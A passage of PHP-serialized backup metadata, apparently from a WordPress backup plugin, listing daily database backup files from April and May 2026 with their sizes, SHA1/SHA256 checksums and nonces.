7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778377635;a:11:{s:2:\"db\";s:47:\"backup_2026-05-10-0147_AMB18_8da8bfb10392-db.gz\";s:7:\"db-size\";i:2078992;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"91df97d06788a0b8d176185bcf444788a7f5e3e1\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"bd93506312236ce351bda64ec693bd55b8d6d627213654f9997f9811e2068d2f\";}}s:5:\"nonce\";s:12:\"8da8bfb10392\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778289551;a:11:{s:2:\"db\";s:47:\"backup_2026-05-09-0119_AMB18_4047dbbdc592-db.gz\";s:7:\"db-size\";i:2077127;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"69ea4704d0de2c645ce8413e2aabeb4213ab5acd\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8184515ced0363c4ab82b9fea9012e5dc052e6ccefeedf737407bf4d7c420ba5\";}}s:5:\"nonce\";s:12:\"4047dbbdc592\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778203732;a:11:{s:2:\"db\";s:47:\"backup_2026-05-08-0128_AMB18_e04696f0b7bb-db.gz\";s:7:\"db-size\";i:2072156;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"400ec7d04e1d773c61c4ab74c91bfeb1225110a9\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"15c567969ddae7bffe1b2a9dadaa33f719945232013c54785f30a6edc23ebe75\";}}s:5:\"nonce\";s:12:\"e04696f0b7bb\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778116560;a:11:{s:2:\"db\";s:47:\"backup_2026-05-07-0116_AMB18_6f2f31a0ae30-db.gz\";s:7:\"db-size\";i:2065742;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"bb8b4d3257a17ea18c03ccbd99372b0be6cc7b6d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c62afd696183f87b3eb8ca28f9d8a4fc6e5721ce44816ccbc840e647dad631a2\";}}s:5:\"nonce\";s:12:\"6f2f31a0ae30\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1778030201;a:11:{s:2:\"db\";s:47:\"backup_2026-05-06-0116_AMB18_9b1046085078-db.gz\";s:7:\"db-size\";i:2064034;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a285cc3f491737e2dc83097b870964b6da80e7aa\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7526b06258e596b0ae151cbfcd3d06e8aaca63747fabed86b283c5d73661891d\";}}s:5:\"nonce\";s:12:\"9b1046085078\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777943701;a:11:{s:2:\"db\";s:47:\"backup_2026-05-05-0115_AMB18_41149fc06caa-db.gz\";s:7:\"db-size\";i:2062291;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"316c5f948b44003aa1a82d8aba0782a3ac711f24\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"72e6b0f171e7346f0d47eaab108f4a6a9f7788d92c0272dee08ef93c8c0a9140\";}}s:5:\"nonce\";s:12:\"41149fc06caa\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777857065;a:11:{s:2:\"db\";s:47:\"backup_2026-05-04-0111_AMB18_45a521b51f28-db.gz\";s:7:\"db-size\";i:2059905;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"a2119bd8b6e7aa58e2a77a10838f44eacca430ba\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5e6af676624e9688cb69f85c801a0461441f4ebcddb69d19fb423b7115ec027a\";}}s:5:\"nonce\";s:12:\"45a521b51f28\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777771660;a:11:{s:2:\"db\";s:47:\"backup_2026-05-03-0127_AMB18_2dad2032bb3f-db.gz\";s:7:\"db-size\";i:2058223;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"592177957660e959e4f615b9c45b5e65c5cc3007\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"37883da8da020ed5311c4a706bad47a1eb82fcf775737c1460c66fa394eb7998\";}}s:5:\"nonce\";s:12:\"2dad2032bb3f\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777684475;a:11:{s:2:\"db\";s:47:\"backup_2026-05-02-0114_AMB18_0a807bff0190-db.gz\";s:7:\"db-size\";i:2056666;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"2c46d2f1086a7305c4cf0235660018d4beb3aeb9\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"da9f8e504dabc4790a2f7e962a562fca18ffa5c6f607f844abcfb841dedd94f6\";}}s:5:\"nonce\";s:12:\"0a807bff0190\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777597876;a:11:{s:2:\"db\";s:47:\"backup_2026-05-01-0111_AMB18_56ca6873f564-db.gz\";s:7:\"db-size\";i:2053856;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"21ef09b228b2bf0f0100ca06bb6c54f9c1f4c823\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"7a89b7ce5c0f3fc01176c58e3ff15100d89f4985196824c9a8f34056626d8cd0\";}}s:5:\"nonce\";s:12:\"56ca6873f564\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777512756;a:11:{s:2:\"db\";s:47:\"backup_2026-04-30-0132_AMB18_834f558c7c8e-db.gz\";s:7:\"db-size\";i:2051385;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"351e9a6e034780be2d99615b6e4bb4896893af14\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"5b416eef5373ed595291856a32875476a2976e3c038647ea59fa87e00045c378\";}}s:5:\"nonce\";s:12:\"834f558c7c8e\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777425051;a:11:{s:2:\"db\";s:47:\"backup_2026-04-29-0110_AMB18_f9ee3d641844-db.gz\";s:7:\"db-size\";i:2047374;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"8cb10d21e56a8de76224c3a9d1c4cd67ee5be82b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"0bb39d56e8ceb378531186cda07ecd01dd40dd8f593d9dd3e3cdb80d4ce1d26b\";}}s:5:\"nonce\";s:12:\"f9ee3d641844\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777338868;a:11:{s:2:\"db\";s:47:\"backup_2026-04-28-0114_AMB18_7b1dcff66092-db.gz\";s:7:\"db-size\";i:2046605;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ed2769796a2950b58686b25b6cefbd28c71564f7\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"34a76085f63ebe14c88da00bb07ee54f061f347a9ad29ee81625232392ddbc86\";}}s:5:\"nonce\";s:12:\"7b1dcff66092\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777253005;a:11:{s:2:\"db\";s:47:\"backup_2026-04-27-0123_AMB18_65a4a8adcfdf-db.gz\";s:7:\"db-size\";i:2045852;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"8ba9ad9be5277fd0588130c297b92a60824626ef\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"8e81290297b47faa9e2bd4486f179c3724aef3d94b0e5b12c293e7038af6edd7\";}}s:5:\"nonce\";s:12:\"65a4a8adcfdf\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777166547;a:11:{s:2:\"db\";s:47:\"backup_2026-04-26-0122_AMB18_6431989b6dc0-db.gz\";s:7:\"db-size\";i:2039905;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"37ffbcbfd9fee1cd36f68e3efada0b7c55ad5a36\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e694e3ec388062dcfaaa78186231bb2f1ab42db50cef8c47e46794f5e8fa91f5\";}}s:5:\"nonce\";s:12:\"6431989b6dc0\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1777080272;a:11:{s:2:\"db\";s:47:\"backup_2026-04-25-0124_AMB18_6c2f60db6b95-db.gz\";s:7:\"db-size\";i:2038706;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"66894171e271c4fa489aa5da80c7b1f28329e50d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"217f0d688591967fec70200d779f4c71f0e380985853bc994e8249cb1c034532\";}}s:5:\"nonce\";s:12:\"6c2f60db6b95\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776993182;a:11:{s:2:\"db\";s:47:\"backup_2026-04-24-0113_AMB18_59bacfdd1003-db.gz\";s:7:\"db-size\";i:2038449;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"692c9baa3ae9f90ed7912ff50fac722bd6e6799c\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"85c3944b73a69ec9b46b0be38113d2a138cc7e5e6203a5578fc74049be69d460\";}}s:5:\"nonce\";s:12:\"59bacfdd1003\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776907558;a:11:{s:2:\"db\";s:47:\"backup_2026-04-23-0125_AMB18_18a81be3d24c-db.gz\";s:7:\"db-size\";i:2036808;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9e49aed93f683b5d0e675c3ef17ee3b781cd6f13\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"831d36f641a5f4057de2b9cf1cd0c744fd8471c85194c7190c92b8da83cc347f\";}}s:5:\"nonce\";s:12:\"18a81be3d24c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776820256;a:11:{s:2:\"db\";s:47:\"backup_2026-04-22-0110_AMB18_d1c78d5bd1a0-db.gz\";s:7:\"db-size\";i:2036545;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"eca5844598388f5dfb0858028f026540668f7a83\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"6959db359fdba7f5f69d581eed17890e350271d1dedfb08c8d989a1c401b78e5\";}}s:5:\"nonce\";s:12:\"d1c78d5bd1a0\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776734475;a:11:{s:2:\"db\";s:47:\"backup_2026-04-21-0121_AMB18_9cfbd30bff21-db.gz\";s:7:\"db-size\";i:2036354;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"2b664ef8536f49976e6b60058fc95c1121dd7833\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"386125c846156e7fea55b9a9ea4706498b3be74e6dccf75ad28e38b4f6850864\";}}s:5:\"nonce\";s:12:\"9cfbd30bff21\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776647646;a:11:{s:2:\"db\";s:47:\"backup_2026-04-20-0114_AMB18_cf5f17e6174a-db.gz\";s:7:\"db-size\";i:2036077;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"ebecdbe5def26bd54aaa554fcadf464b95155987\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"48f22213101b43e812407bf31f7fe8b5707a099157e71f95cbb54f1f7387714c\";}}s:5:\"nonce\";s:12:\"cf5f17e6174a\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776562465;a:11:{s:2:\"db\";s:47:\"backup_2026-04-19-0134_AMB18_133e69093d3c-db.gz\";s:7:\"db-size\";i:2035463;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"2c45879af2df1a759827180d42e624840bea4c30\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f947e05e4e17f4bae69c5867cb60d2ed02145c89a8499182163b312c62c40388\";}}s:5:\"nonce\";s:12:\"133e69093d3c\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776475233;a:11:{s:2:\"db\";s:47:\"backup_2026-04-18-0120_AMB18_d80c79f9c191-db.gz\";s:7:\"db-size\";i:2034536;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"39f684019ca381c3c00179819e7b154755e734b2\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"d5231d9181e5c2863114a4693435d6eca2b1b6d52b339a6f8c8d7790272a6af8\";}}s:5:\"nonce\";s:12:\"d80c79f9c191\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776388482;a:11:{s:2:\"db\";s:47:\"backup_2026-04-17-0114_AMB18_9c05d0d747c4-db.gz\";s:7:\"db-size\";i:2034307;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"682433a8df978b39f184cfcbb4f0f6498990fc37\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"b8de2588520fa52ec67aa2aa9bb91e630b0967ff9987ae53466ab722242a4d54\";}}s:5:\"nonce\";s:12:\"9c05d0d747c4\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776302042;a:11:{s:2:\"db\";s:47:\"backup_2026-04-16-0114_AMB18_8668cce61ca7-db.gz\";s:7:\"db-size\";i:2032994;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4a0a273fba6c2a3fe1725dbeb2d4e543928f72e7\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"08b2a0949949b3c9dc8958f1640892680bc5a1d96e93af228e6fb84792c65bda\";}}s:5:\"nonce\";s:12:\"8668cce61ca7\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776215550;a:11:{s:2:\"db\";s:47:\"backup_2026-04-15-0112_AMB18_603ffe9edd79-db.gz\";s:7:\"db-size\";i:2032612;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"19627083611c0c6774ae49208c7a6e49e91c719f\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"c4ff5564a29a28b354bbb79cf28645c29546dae22aebe548637aaf6bcb51d94f\";}}s:5:\"nonce\";s:12:\"603ffe9edd79\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776130758;a:11:{s:2:\"db\";s:47:\"backup_2026-04-14-0139_AMB18_8b4f912ae484-db.gz\";s:7:\"db-size\";i:2032094;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"704a09fbecbb08e384003dd2d102ce53fffcd5c8\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"e34ee5228d9051a9a8ac1f99426dc1d5c9f2fed6577d66677c196b53877e254a\";}}s:5:\"nonce\";s:12:\"8b4f912ae484\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1776042893;a:11:{s:2:\"db\";s:47:\"backup_2026-04-13-0114_AMB18_661df99e66df-db.gz\";s:7:\"db-size\";i:2031016;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"47ffcc97c1e64cbe799d0d0284ef287ea976a2b6\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f2d9d8e447e6c09446c0469aaff22f9e817b4d628dd05d7946af8d38d8ad0597\";}}s:5:\"nonce\";s:12:\"661df99e66df\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775956428;a:11:{s:2:\"db\";s:47:\"backup_2026-04-12-0113_AMB18_234f00ffd094-db.gz\";s:7:\"db-size\";i:2030613;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"74ca6399f97b76ef5834a2ca7022659c215a0da3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"89ed46277d325b68277d882deeeb6b875c8991914c7804ccb8afd8b461d5efc8\";}}s:5:\"nonce\";s:12:\"234f00ffd094\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775870229;a:11:{s:2:\"db\";s:47:\"backup_2026-04-11-0117_AMB18_fe49a5563bf6-db.gz\";s:7:\"db-size\";i:2029762;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4fdf0087b7bc90d14231f715989e01100f62b1a3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"911710e5de436c1fb99025e698b53048d7c46ffe822ae66a5d4b5ffca65bba2e\";}}s:5:\"nonce\";s:12:\"fe49a5563bf6\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775783751;a:11:{s:2:\"db\";s:47:\"backup_2026-04-10-0115_AMB18_2f280b7b4401-db.gz\";s:7:\"db-size\";i:2029217;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"712fd22b94760dc4da34c4ae2ec81113810f3207\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"491b89a48216c99d16a03dea3e07b5736362586e14635b334e589862b116d9cb\";}}s:5:\"nonce\";s:12:\"2f280b7b4401\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775697146;a:11:{s:2:\"db\";s:47:\"backup_2026-04-09-0112_AMB18_cd153e2bd412-db.gz\";s:7:\"db-size\";i:2027371;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"e3b9b66ea7fb8b382ba57fbd29575e3058d7fa20\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"49660aa01dcd021787982585043b3901b53eec2b394f07ba261693f2ab98ca19\";}}s:5:\"nonce\";s:12:\"cd153e2bd412\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775610873;a:11:{s:2:\"db\";s:47:\"backup_2026-04-08-0114_AMB18_f56c321132b5-db.gz\";s:7:\"db-size\";i:2027010;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"d0591531d8202108829db2638c8942c71b572900\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"9f128af719982cd7108e98250b6a1b100f081ce9f233618ca83cd8c0c1ad8f5f\";}}s:5:\"nonce\";s:12:\"f56c321132b5\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775524348;a:11:{s:2:\"db\";s:47:\"backup_2026-04-07-0112_AMB18_44c9ef8cc0a7-db.gz\";s:7:\"db-size\";i:2026622;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"868b94eabdc7e47f748a6f38e2e72d4fafaf779b\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"fc374dece153ac37b5ed368d004b0bd32734121fba5ed04c89baf7fea60c335a\";}}s:5:\"nonce\";s:12:\"44c9ef8cc0a7\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775437890;a:11:{s:2:\"db\";s:47:\"backup_2026-04-06-0111_AMB18_ae9a6b0fe0e1-db.gz\";s:7:\"db-size\";i:2025414;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c8f0d5567467a9c0abb237999f71fd6ee38ebd05\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"317a6e803e834abc58d7c33eb4f89096b30bf6aae7fa4ed2905c665745d08caf\";}}s:5:\"nonce\";s:12:\"ae9a6b0fe0e1\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775351698;a:11:{s:2:\"db\";s:47:\"backup_2026-04-05-0114_AMB18_f64107e8e75a-db.gz\";s:7:\"db-size\";i:2025130;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"f0986cbd6316aa48b6c77b9fb40bb246b4c343b3\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"193b7df6d45a16a36f1d6207c96e9245a1b110bb7befa404dd987c5a09fc6377\";}}s:5:\"nonce\";s:12:\"f64107e8e75a\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s:12:\"is_multisite\";b:0;}i:1775265506;a:11:{s:2:\"db\";s:47:\"backup_2026-04-04-0118_AMB18_60d5305321d9-db.gz\";s:7:\"db-size\";i:2024776;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"9c0c84187815a736ff8e21cd915d9093a5b8f1bd\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"72296303be9f4dd29a433b145c5edc633ca278d6798f4e744827b25e4f6faf43\";}}s:5:\"nonce\";s:12:\"60d5305321d9\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:6:\"1.26.1\";s:21:\"last_saved_by_version\";s:6:\"1.26.1\";s: